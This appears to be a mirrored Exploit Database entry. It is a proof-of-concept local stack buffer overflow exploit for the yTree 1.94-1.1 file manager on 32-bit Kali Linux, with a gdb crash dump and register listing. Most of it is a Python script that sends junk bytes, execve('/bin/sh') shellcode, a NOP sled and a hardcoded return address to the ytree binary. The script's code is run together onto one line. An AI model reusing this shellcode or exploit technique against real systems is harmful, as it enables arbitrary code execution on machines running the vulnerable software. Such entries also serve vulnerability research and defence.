yTree 1.94-1.1 – Local Buffer Overflow (PoC)

• Exploit Database
• 115 阅读

• 作者： Juan Sacco
  日期： 2016-02-03
• 类别：

  • dos
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/39406/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73

  # Exploit Author: Juan Sacco - http://www.exploitpack.com -jsacco@exploitpack.com # Program affected: yTree - File manager for terminals v1.94-1.1 # Description: yTree is prone to a stack-based overflow, an attacker could exploit # this issue to execute arbitrary code in the context of the application. # Failed exploit attempts will result in a denial-of-service condition. # # Tested and developed on:Kali Linux 2.0 x86 - https://www.kali.org # # Program Description: This is a file manager that separates files from directories # and allows you to select and manage files from different directories. # It works on black and white or color terminals and is UTF-8 locales aware. # Vendor homepage: http://www.han.de/~werner/ytree.html # Kali Linux 2.0 package: pool/main/y/ytree/ytree_1.94-1.1_i386.deb # MD5sum: 7d55d9c7e8afb4405c149463613f596b # # Program received signal SIGSEGV, Segmentation fault. # --------------------------------------------------------------------------[regs] # EAX: 0x41414141EBX: 0xB7FB8000ECX: 0x00000000EDX: 0x08071342o d I t s z a P c # ESI: 0xBFFFF134EDI: 0x41414141EBP: 0x0806FC60ESP: 0xBFFFDC50EIP: 0xB7F888C1 # CS: 0073DS: 007BES: 007BFS: 0000GS: 0033SS: 007B # --------------------------------------------------------------------------[code] # => 0xb7f888c1 <werase+49>: moveax,DWORD PTR [eax+0x4c] #0xb7f888c4 <werase+52>: movDWORD PTR [esp+0x24],eax #0xb7f888c8 <werase+56>: moveax,DWORD PTR [edi+0x50] #0xb7f888cb <werase+59>: movDWORD PTR [esp+0x28],eax #0xb7f888cf <werase+63>: moveax,DWORD PTR [edi+0x54] #0xb7f888d2 <werase+66>: movDWORD PTR [esp+0x2c],eax #0xb7f888d6 <werase+70>: moveax,DWORD PTR [edi+0x58] #0xb7f888d9 <werase+73>: movDWORD PTR [esp+0x30],eax # -------------------------------------------------------------------------------- # 0xb7f888c1 in werase () from /lib/i386-linux-gnu/libncursesw.so.5 # gdb$ backtrace # 00xb7f888c1 in werase () from /lib/i386-linux-gnu/libncursesw.so.5 # 10x08050f43 in ?? () # 20x08051182 in ?? () # 30x0805972f in ?? () # 40x0804a68a in ?? () # 50xb7d82a63 in __libc_start_main (main=0x804a560, argc=0x2, argv=0xbffff294, init=0x8064df0, fini=0x8064de0, rtld_fini=0xb7fedc90 <_dl_fini>, stack_end=0xbffff28c) at libc-start.c:287 # 60x0804a701 in ?? () import os,subprocess def run(): try: print "# yTree Buffer Overflow by Juan Sacco" print "# It&apos;s fuzzing time on unusable exploits" print "# This exploit is for educational purposes only" # JUNK + SHELLCODE + NOPS + EIP junk = "\x41"*65 shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" nops = "\x90"*1200 eip = "\xd0\xf6\xff\xbf" subprocess.call(["ytree",&apos; &apos;, junk + shellcode + nops + eip]) except OSError as e: if e.errno == os.errno.ENOENT: print "Sorry, yTree not found!" else: print "Error executing exploit" raise def howtousage(): print "Snap! Something went wrong" sys.exit(-1) if __name__ == &apos;__main__&apos;: try: print "Exploit yTree v1.94-1.1 Local Overflow Exploit" print "Author: Juan Sacco" except IndexError: howtousage() run()